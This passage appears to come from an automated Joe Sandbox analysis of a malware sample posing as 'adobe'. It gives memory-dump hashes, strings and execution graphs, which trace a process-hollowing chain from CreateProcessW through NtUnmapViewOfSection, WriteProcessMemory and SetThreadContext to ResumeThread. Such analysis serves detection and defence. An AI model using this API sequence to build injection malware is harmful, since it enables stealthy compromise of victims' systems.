                      • Opcode ID: 0862f9fe34b19cede2151b4743e846acdf3d37bc45b96fb3091c1403d8554b93
                      • Instruction ID: fbdd4a41ec9c5619ddd1f2853c232479bdd15c657333dffa582d23d3a06aaecc
                      • Opcode Fuzzy Hash: 0862f9fe34b19cede2151b4743e846acdf3d37bc45b96fb3091c1403d8554b93
                      • Instruction Fuzzy Hash: 38F06271B041210FDB57873CD86472A67E6DBC9654F508876E10EC7355DE26DC438391
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 64d177c8c5ee42f8afcebbe0a8c792c901b55288c5e82eee8232fdaea3263387
                      • Instruction ID: 50f9a124b129c514603e51781c2c706f5e2e3977ae1f7d2bf41884449f51b754
                      • Opcode Fuzzy Hash: 64d177c8c5ee42f8afcebbe0a8c792c901b55288c5e82eee8232fdaea3263387
                      • Instruction Fuzzy Hash: CEF0A732F30235ABDB549665E804A9EB73AE784754F104429ED01A7340DB33AC1187D0
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bc6fc4f4c12c911a1499ed75b582e7804bc40790c5bba3acba058911ee09b403
                      • Instruction ID: 18e00847a37a3d38c764658de8874984140eb97b39f0be1b51a7483155150ce6
                      • Opcode Fuzzy Hash: bc6fc4f4c12c911a1499ed75b582e7804bc40790c5bba3acba058911ee09b403
                      • Instruction Fuzzy Hash: A1E0DF71A2436AABDB50CA78C94A79A77A8D712218F64C4B5D844CB201E536DA078341
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3bd82ae8ca65274fc3454b2c4d1ce8315d717affde06d8b7be6468b424b4745b
                      • Instruction ID: 3fa72c7e2a0c7421d85e372afc7c6066e124f6167edfecfd6418120f67249e37
                      • Opcode Fuzzy Hash: 3bd82ae8ca65274fc3454b2c4d1ce8315d717affde06d8b7be6468b424b4745b
                      • Instruction Fuzzy Hash: 05E0C2B0E1426AABDF50CFB4C9457AF73ACE74520CF2084B4D409C7201E236CA028740
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                      • API String ID: 0-1324371161
                      • Opcode ID: a9a81b0ac6b4bf7e9132878e2ca85c0eefb80d42bf11fc56d3dffde1012d70a3
                      • Instruction ID: 8137f8a9dbe2cd7a7265b17ad03d0042cf7575fbe65cc81fe019ce4bdcf7a38a
                      • Opcode Fuzzy Hash: a9a81b0ac6b4bf7e9132878e2ca85c0eefb80d42bf11fc56d3dffde1012d70a3
                      • Instruction Fuzzy Hash: C9123C30E0122A8FDB64DF79C954A9EB7B2FF98304F208569D409AB364DB349D85CF90
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                      • API String ID: 0-1078448309
                      • Opcode ID: 78f179bc5cdd318deb007b575dcb5898bc07f2d7001cd74badadd9ff44443bdb
                      • Instruction ID: 4d826fd3d7931c815979e5adbc8e9005147a9456a2dd399e7346f943ebd85f24
                      • Opcode Fuzzy Hash: 78f179bc5cdd318deb007b575dcb5898bc07f2d7001cd74badadd9ff44443bdb
                      • Instruction Fuzzy Hash: 7B91B230A1021ADFDB64DF69D644B6EB7B2FF94308F688529E40297394CB79DC45CB90
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                      • API String ID: 0-1342094364
                      • Opcode ID: 66436f3fe24ea6c8c4a1c48b5280fe72ba477c31d90ebf8b397e2c14a552f6cb
                      • Instruction ID: 62dbf8848a17ab447b4154d5730e60896b54655bde3eade1e369799c5a8cb953
                      • Opcode Fuzzy Hash: 66436f3fe24ea6c8c4a1c48b5280fe72ba477c31d90ebf8b397e2c14a552f6cb
                      • Instruction Fuzzy Hash: BBF15230B0021ACFDB65EF68D554A6EB7B2FF94304F648569D4059B3A8DB35EC82CB90
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: _$$kq$$kq$$kq$$kq
                      • API String ID: 0-641801418
                      • Opcode ID: 51d599896ff79cc59f9b7eacfe154460e9a1816b1040f21f22dee4e367c93d5c
                      • Instruction ID: 6f1c0d1acea1730263a01ef1dc6d3616c616638c497fdbc69b9c8fcccafaaf94
                      • Opcode Fuzzy Hash: 51d599896ff79cc59f9b7eacfe154460e9a1816b1040f21f22dee4e367c93d5c
                      • Instruction Fuzzy Hash: 8F518234F102168FDF69DB68E5806ADB3B2FB94715F288929D806D7354DB35DC42CB90
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq$$kq$$kq
                      • API String ID: 0-2881790790
                      • Opcode ID: d8ed96a2328b9e524c20adea0fd983594c9a8bd8955d552081319a216a90adde
                      • Instruction ID: 689de1f1dc730940d85372450e495ae4ea72ed23f3809b12a14cc15b1520118b
                      • Opcode Fuzzy Hash: d8ed96a2328b9e524c20adea0fd983594c9a8bd8955d552081319a216a90adde
                      • Instruction Fuzzy Hash: DAB13A30F1021A8FDB64EBA8D5946AEB7B2FF94304F248429D406DB395DB35DC86DB90
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: LRkq$LRkq$$kq$$kq
                      • API String ID: 0-2392252538
                      • Opcode ID: f339258fd27609365d4d8b35ce4b6be329a9379064ec9a0c9a1bbf5aea314c19
                      • Instruction ID: 65449c52de7942812f004f4f4b5d2da98cbbfc33cd2015b962741d4c488661c0
                      • Opcode Fuzzy Hash: f339258fd27609365d4d8b35ce4b6be329a9379064ec9a0c9a1bbf5aea314c19
                      • Instruction Fuzzy Hash: 9D51E430B002129FDB58DB68E954A6AB7F2FF98304F148569E4069F3A5DF34EC44CBA0

                      Execution Graph

                      Execution Coverage:38.2%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:0%
                      Total number of Nodes:103
                      Total number of Limit Nodes:0
                      execution_graph 800 2410000 833 2410054 800->833 802 2410006 865 2410420 802->865 804 2410083 805 2410420 VirtualAlloc 804->805 806 241008f 805->806 807 2410420 VirtualAlloc 806->807 808 2410098 807->808 809 2410420 VirtualAlloc 808->809 810 24100a1 809->810 811 2410420 VirtualAlloc 810->811 812 24100aa 811->812 813 2410420 VirtualAlloc 812->813 814 24100b6 813->814 815 2410155 CreateProcessW 814->815 816 2410170 815->816 817 241018b NtUnmapViewOfSection 816->817 818 241019b 817->818 819 24101b8 VirtualAllocEx 818->819 820 24101d2 819->820 821 2410214 WriteProcessMemory 820->821 822 2410220 821->822 823 24102fa WriteProcessMemory 822->823 824 241031e 822->824 823->822 825 241034f Wow64GetThreadContext 824->825 826 241035e 825->826 827 241039e WriteProcessMemory 826->827 828 24103aa 827->828 829 24103e5 Wow64SetThreadContext 828->829 830 24103f5 829->830 831 2410407 ResumeThread 830->831 832 2410415 831->832 834 241005e 833->834 835 2410420 VirtualAlloc 834->835 836 2410083 835->836 837 2410420 VirtualAlloc 836->837 838 241008f 837->838 839 2410420 VirtualAlloc 838->839 840 2410098 839->840 841 2410420 VirtualAlloc 840->841 842 24100a1 841->842 843 2410420 VirtualAlloc 842->843 844 24100aa 843->844 845 2410420 VirtualAlloc 844->845 846 24100b6 845->846 847 2410155 CreateProcessW 846->847 848 2410170 847->848 849 241018b NtUnmapViewOfSection 848->849 850 241019b 849->850 851 24101b8 VirtualAllocEx 850->851 852 24101d2 851->852 853 2410214 WriteProcessMemory 852->853 854 2410220 853->854 855 24102fa WriteProcessMemory 854->855 856 241031e 854->856 855->854 857 241034f Wow64GetThreadContext 856->857 858 241035e 857->858 859 241039e WriteProcessMemory 858->859 860 24103aa 859->860 861 24103e5 Wow64SetThreadContext 860->861 862 24103f5 861->862 863 2410407 ResumeThread 862->863 864 2410415 863->864 864->802 866 2410427 865->866 867 2410432 VirtualAlloc 866->867 868 241044a 867->868 868->804 922 8d01ec 924 8d01f3 922->924 923 8d01fd 924->923 925 8d0a6b VirtualAlloc 924->925 926 8d0a9f 925->926 898 8d0ac9 899 8d0b13 CallWindowProcA 898->899 900 8d0b4a 899->900 869 8d0898 870 8d08a9 869->870 877 8d04b4 870->877 873 8d04b4 VirtualAlloc 874 8d091e 873->874 881 8d04c0 874->881 878 8d0a28 VirtualAlloc 877->878 880 8d090a 878->880 880->873 882 8d0ad0 CallWindowProcA 881->882 884 8d0963 882->884 885 8d0888 886 8d08a9 885->886 887 8d04b4 VirtualAlloc 886->887 888 8d090a 887->888 889 8d04b4 VirtualAlloc 888->889 890 8d091e 889->890 891 8d04c0 CallWindowProcA 890->891 892 8d0963 891->892 933 8d0978 934 8d09fd VirtualAlloc 933->934 937 8d098e 933->937 936 8d0a9f 934->936 916 8d03d0 917 8d049c 916->917 918 8d043e 916->918 919 8d0456 918->919 920 8d0a6b VirtualAlloc 918->920 921 8d0a9f 920->921

                      Callgraph

                      • Executed
                      • Not Executed
                      • Opacity -> Relevance
                      • Disassembly available
                      callgraph 0 Function_008D020D 1 Function_008D028C 2 Function_008D010C 3 Function_008D0888 35 Function_008D04B4 3->35 50 Function_008D04C0 3->50 4 Function_008D0388 5 Function_008D0308 6 Function_008D0184 7 Function_008D0280 8 Function_008D0080 9 Function_008D0100 10 Function_008D039D 11 Function_008D049D 12 Function_02410450 34 Function_02410477 12->34 69 Function_024104AB 12->69 13 Function_008D011C 14 Function_008D021F 15 Function_008D0499 16 Function_02410054 16->12 56 Function_02410419 16->56 61 Function_02410420 16->61 17 Function_008D0898 17->35 17->50 18 Function_008D0298 19 Function_008D0014 20 Function_008D0314 21 Function_008D0190 22 Function_008D0090 23 Function_008D01AC 24 Function_008D012C 25 Function_008D032C 26 Function_008D02A4 27 Function_008D01A0 28 Function_008D00A0 29 Function_008D0320 30 Function_008D00BC 31 Function_008D013C 32 Function_008D01B8 33 Function_008D0338 36 Function_008D03B4 37 Function_008D0230 38 Function_008D00B0 39 Function_008D02B0 40 Function_008D004D 41 Function_02410000 41->12 41->16 41->56 41->61 42 Function_008D014C 43 Function_008D02CC 44 Function_008D0AC9 45 Function_008D0848 46 Function_008D00C8 47 Function_008D0245 48 Function_008D01C4 49 Function_008D0344 51 Function_008D03C0 52 Function_008D015C 53 Function_008D035C 54 Function_008D0258 55 Function_008D02D8 57 Function_008D00D4 58 Function_008D01D0 59 Function_008D0350 60 Function_008D03D0 61->12 61->56 62 Function_008D016C 63 Function_008D01EC 64 Function_008D036C 65 Function_008D046B 66 Function_008D00E4 67 Function_008D0264 68 Function_008D02E4 70 Function_008D0060 71 Function_008D01E0 72 Function_008D02FC 73 Function_008D0178 74 Function_008D01F8 75 Function_008D0378 76 Function_008D0978 77 Function_008D00F0 78 Function_008D0070 79 Function_008D0270 80 Function_008D02F0 81 Function_008D04F0

                      Control-flow Graph

                      APIs
                        • Part of subcall function 02410054: CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 02410167
                      • NtUnmapViewOfSection.NTDLL(?,?,0000002E,00000022,?,F21037D0,00000012,?,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 02410192
                      • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 024101C9
                      • WriteProcessMemory.KERNELBASE ref: 02410217
                      • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,CF14E85B,00000012), ref: 024102FD
                      • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 02410355
                      • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 024103A1
                      • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 024103EC
                      • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 0241040C
                      Memory Dump Source
                      • Source File: 00000007.00000002.1970916978.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_2410000_adobe.jbxd
                      Similarity
                      • API ID: Process$MemoryThreadWrite$ContextWow64$AllocCreateResumeSectionUnmapViewVirtual
                      • String ID:
                      • API String ID: 2814188497-0
                      • Opcode ID: ea99b0024c625f74fea6b8fa68515aaaf4f6426c1bd6aa4e5dfeea17c57a5219
                      • Instruction ID: c6c24ce2a74ab8ba60ed8be27b54c71fffa2fc4ac1997251194cd2bf7603f72e
                      • Opcode Fuzzy Hash: ea99b0024c625f74fea6b8fa68515aaaf4f6426c1bd6aa4e5dfeea17c57a5219
                      • Instruction Fuzzy Hash: AAB11178690354BFE61577F29C87F1937269F46708F14906EFA005F1D2CAB26C918B62

                      Control-flow Graph

                      APIs
                        • Part of subcall function 02410420: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,02410083,0000003C,0000001E,0000004A,0000003E,00000042), ref: 0241043F
                      • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 02410167
                      • NtUnmapViewOfSection.NTDLL(?,?,0000002E,00000022,?,F21037D0,00000012,?,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 02410192
                      • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 024101C9
                      • WriteProcessMemory.KERNELBASE ref: 02410217
                      • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,CF14E85B,00000012), ref: 024102FD
                      • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 02410355
                      • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 024103A1
                      • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 024103EC
                      • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 0241040C
                      Memory Dump Source
                      • Source File: 00000007.00000002.1970916978.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_2410000_adobe.jbxd
                      Similarity
                      • API ID: Process$MemoryThreadWrite$AllocContextVirtualWow64$CreateResumeSectionUnmapView
                      • String ID:
                      • API String ID: 4009322845-0
                      • Opcode ID: abefd893c78f63ec501357fb14bf61d80a739cae84c00b71e3bd370fcc70d613
                      • Instruction ID: adbced573db0980d45a1063f7fa313dba75812dbc3b1cda19246d09cdf2ee6a8
                      • Opcode Fuzzy Hash: abefd893c78f63ec501357fb14bf61d80a739cae84c00b71e3bd370fcc70d613
                      • Instruction Fuzzy Hash: 93A1EE78690214BFE51477F2DC87F2936179F85B0CF20906EFA006F1D1CAB2BDA18A61

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 372 8d04c0-8d0b48 CallWindowProcA 375 8d0b4a-8d0b50 372->375 376 8d0b51-8d0b65 372->376 375->376
                      APIs
                      • CallWindowProcA.USER32(?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 008D0B3B
                      Memory Dump Source
                      • Source File: 00000007.00000002.1970354771.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_8d0000_adobe.jbxd
                      Similarity
                      • API ID: CallProcWindow
                      • String ID:
                      • API String ID: 2714655100-0
                      • Opcode ID: d9e55d912e41d657d9494b3bd9bb4262008c103a628cbad506dcfc7a47632fbb
                      • Instruction ID: c74fdaaa74b15696bbbfbb8a1013ac58feb3024a0b1f0d2b092d1806627b44a0
                      • Opcode Fuzzy Hash: d9e55d912e41d657d9494b3bd9bb4262008c103a628cbad506dcfc7a47632fbb
                      • Instruction Fuzzy Hash: C61104B5904648DFCB10DF9AD844BDEBBF4FB48324F20842AE559A7250D375A944CFA4

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 378 8d0ac9-8d0b0b 379 8d0b13-8d0b48 CallWindowProcA 378->379 380 8d0b4a-8d0b50 379->380 381 8d0b51-8d0b65 379->381 380->381
                      APIs
                      • CallWindowProcA.USER32(?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 008D0B3B
                      Memory Dump Source
                      • Source File: 00000007.00000002.1970354771.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_8d0000_adobe.jbxd
                      Similarity
                      • API ID: CallProcWindow
                      • String ID:
                      • API String ID: 2714655100-0
                      • Opcode ID: 5bf73fc19d19cb431b8871fbc6266b60cba35fe761c04e9feff9e98ae6b56018
                      • Instruction ID: 6d322ca59d1ffdd47854fae3e74954f8f0e28463e07350b8f3892863fedaf494
                      • Opcode Fuzzy Hash: 5bf73fc19d19cb431b8871fbc6266b60cba35fe761c04e9feff9e98ae6b56018
                      • Instruction Fuzzy Hash: AD1104B5904248DFCB20CF99D885BDEBFF4FB48324F20845AE559A7251C375A544CFA4

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 383 8d021f-8d0223 384 8d01dd-8d01df 383->384 385 8d0225-8d0227 383->385 388 8d0199-8d019a 384->388 389 8d01e1-8d01e7 384->389 386 8d0229-8d022b 385->386 387 8d029a 385->387 390 8d0239-8d024a 386->390 394 8d02a3 387->394 391 8d019c-8d01a3 388->391 392 8d0185 388->392 393 8d01f3 389->393 403 8d02bd-8d02c7 390->403 404 8d024c-8d0253 390->404 397 8d01a5-8d01a7 391->397 398 8d0216-8d0287 391->398 392->393 396 8d0187 392->396 399 8d01fa 393->399 400 8d025d-8d025f 394->400 401 8d02a5-8d02a7 394->401 396->399 405 8d0189-8d018b 396->405 397->384 406 8d01fd-8d01ff 399->406 407 8d026e-8d027a 399->407 411 8d0265 400->411 408 8d02a9-8d02ab 401->408 409 8d031a-8d031b 401->409 410 8d02da 403->410 404->400 405->388 406->398 407->411 412 8d027c-8d027f 407->412 408->403 414 8d035b 409->414 413 8d02dc 410->413 410->414 415 8d0267 411->415 412->390 416 8d0281-8d0287 412->416 413->415 417 8d02de-8d02df 413->417 419 8d035d-8d0367 414->419 420 8d0315-8d0316 414->420 415->410 418 8d0269-8d026b 415->418 416->387 417->420 418->407 422 8d0396-8d039c 419->422 421 8d0318 420->421 420->422 421->394 421->409 424 8d03fd-8d043c 422->424 425 8d039e-8d03af 422->425 428 8d049c-8d04ac 424->428 429 8d043e-8d0454 424->429 434 8d04b4-8d0a9d VirtualAlloc 429->434 435 8d0456-8d0469 429->435 439 8d0a9f-8d0aa5 434->439 440 8d0aa6-8d0aba 434->440 439->440
                      Memory Dump Source
                      • Source File: 00000007.00000002.1970354771.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_8d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a946d67d9023fe148a752e3291ae9302f99ee820fa1037c8bb72251a1767abbe
                      • Instruction ID: 71f912301c8452d4ed72035d71138a4ab7add0bb272344e093f8587a06db81ff
                      • Opcode Fuzzy Hash: a946d67d9023fe148a752e3291ae9302f99ee820fa1037c8bb72251a1767abbe
                      • Instruction Fuzzy Hash: 8451327180D388CFCB529FA898597EABFB0FB16320F14029BD580DB356D2358849CB95

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 442 8d0978-8d098c 443 8d09fd-8d0a9d VirtualAlloc 442->443 444 8d098e-8d09fc 442->444 452 8d0a9f-8d0aa5 443->452 453 8d0aa6-8d0aba 443->453 452->453
                      APIs
                      • VirtualAlloc.KERNELBASE(00000000,?,?,?,?,?,?,008D090A,00000040,00001000), ref: 008D0A90
                      Memory Dump Source
                      • Source File: 00000007.00000002.1970354771.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_8d0000_adobe.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: a79000f5427649ab0d60a5c62130d5ac14bf962ce1ca29bf58d3683dfe3dab7c
                      • Instruction ID: b760b76b609605b53af89a5f3c700676310942d1c0ac90fc02076d3f5d317fa7
                      • Opcode Fuzzy Hash: a79000f5427649ab0d60a5c62130d5ac14bf962ce1ca29bf58d3683dfe3dab7c
                      • Instruction Fuzzy Hash: DD416775A006048FC710DF69D584A9ABFF1FF89320F2584A9E549DB361CB34EC05CBA0

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 461 8d04b4-8d0a9d VirtualAlloc 464 8d0a9f-8d0aa5 461->464 465 8d0aa6-8d0aba 461->465 464->465
                      APIs
                      • VirtualAlloc.KERNELBASE(00000000,?,?,?,?,?,?,008D090A,00000040,00001000), ref: 008D0A90
                      Memory Dump Source
                      • Source File: 00000007.00000002.1970354771.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_8d0000_adobe.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 0071a06b608f629c487502fbd9114ce7b8f8f6e9b0183c33b63a6d7f0f248221
                      • Instruction ID: 9702ef6a78971512eab902de6c014b07b131b6dd97f0e66be50275e1f8a1c51e
                      • Opcode Fuzzy Hash: 0071a06b608f629c487502fbd9114ce7b8f8f6e9b0183c33b63a6d7f0f248221
                      • Instruction Fuzzy Hash: 051102B59007589FCB20DF9AD444BDEBBF4FB48320F20842AE558A7250D375A944CFA4

                      Control-flow Graph

                      APIs
                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,02410083,0000003C,0000001E,0000004A,0000003E,00000042), ref: 0241043F
                      Memory Dump Source
                      • Source File: 00000007.00000002.1970916978.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_2410000_adobe.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                      • Instruction ID: 406a345cf16525adb59c6a58a9568889b8f27596614e416540224e31ac903ad4
                      • Opcode Fuzzy Hash: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                      • Instruction Fuzzy Hash: 52D022781843007AF2017BB34C03F083682AF40B09F40181DFB04380E0C6BAA8980A56

                      Execution Graph

                      Execution Coverage:13.8%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:0%
                      Total number of Nodes:44
                      Total number of Limit Nodes:7
                      execution_graph 27497 1080848 27498 108084e 27497->27498 27499 108091b 27498->27499 27501 108134f 27498->27501 27503 1081351 27501->27503 27502 108147a 27502->27498 27503->27502 27505 1088219 27503->27505 27506 1088223 27505->27506 27507 10882d9 27506->27507 27511 67df8d9 27506->27511 27516 67dfb27 27506->27516 27527 67df8e8 27506->27527 27507->27503 27513 67df8fd 27511->27513 27512 67dfb12 27512->27507 27513->27512 27514 67dfd84 GlobalMemoryStatusEx GlobalMemoryStatusEx 27513->27514 27515 67dfb27 GlobalMemoryStatusEx GlobalMemoryStatusEx 27513->27515 27514->27513 27515->27513 27517 67dfb30 27516->27517 27520 67dfb36 27516->27520 27517->27520 27521 67df8fd 27517->27521 27518 67dfb12 27518->27507 27519 67dfbd0 27519->27507 27520->27519 27532 108ed08 27520->27532 27535 108ecfb 27520->27535 27521->27518 27525 67dfd84 GlobalMemoryStatusEx GlobalMemoryStatusEx 27521->27525 27526 67dfb27 GlobalMemoryStatusEx GlobalMemoryStatusEx 27521->27526 27522 67dfc9e 27522->27507 27525->27521 27526->27521 27529 67df8fd 27527->27529 27528 67dfb12 27528->27507 27529->27528 27530 67dfd84 GlobalMemoryStatusEx GlobalMemoryStatusEx 27529->27530 27531 67dfb27 GlobalMemoryStatusEx GlobalMemoryStatusEx 27529->27531 27530->27529 27531->27529 27538 108ed33 27532->27538 27533 108ed16 27533->27522 27536 108ed16 27535->27536 27537 108ed33 2 API calls 27535->27537 27536->27522 27537->27536 27539 108ed3c 27538->27539 27540 108ed4d 27539->27540 27546 108ed33 GlobalMemoryStatusEx 27539->27546 27547 108ee18 27539->27547 27540->27533 27541 108ed92 27542 108ed96 27541->27542 27543 108ee5e GlobalMemoryStatusEx 27541->27543 27542->27533 27544 108ee8e 27543->27544 27544->27533 27546->27541 27548 108ee5e GlobalMemoryStatusEx 27547->27548 27549 108ee8e 27548->27549 27549->27541
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                      • API String ID: 0-1342094364
                      • Opcode ID: 23865cdf1bde7adf3a233bd13ac0b3bc86a6a77366272fcbb7982e7b1eefc7df
                      • Instruction ID: 4f23fc45014a2bc60684bde9a74aeee5573203ff36234f763caf5ced6578de4b
                      • Opcode Fuzzy Hash: 23865cdf1bde7adf3a233bd13ac0b3bc86a6a77366272fcbb7982e7b1eefc7df
                      • Instruction Fuzzy Hash: B3D26B30E006058FDB64DF64C584AADB7F2FF89310F648969D459AB365EB34ED86CB80
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.4208993616.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_67d0000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                      • API String ID: 0-1342094364
                      • Opcode ID: b00d15eafa03c6ffd021b0c5fb749388fd657998d69cc962e70577eadb99d829
                      • Instruction ID: 318646e4103a739c0c35b9af95ee8bfb84a6555952b955959160348ab77a8aea
                      • Opcode Fuzzy Hash: b00d15eafa03c6ffd021b0c5fb749388fd657998d69cc962e70577eadb99d829
                      • Instruction Fuzzy Hash: E35280B0E002098FDF64DB68D5807BEB7B6EB85710F258C26E405EB395DA35EC85CB91

                      Control-flow Graph

                      • Executed
                      • Not Executed
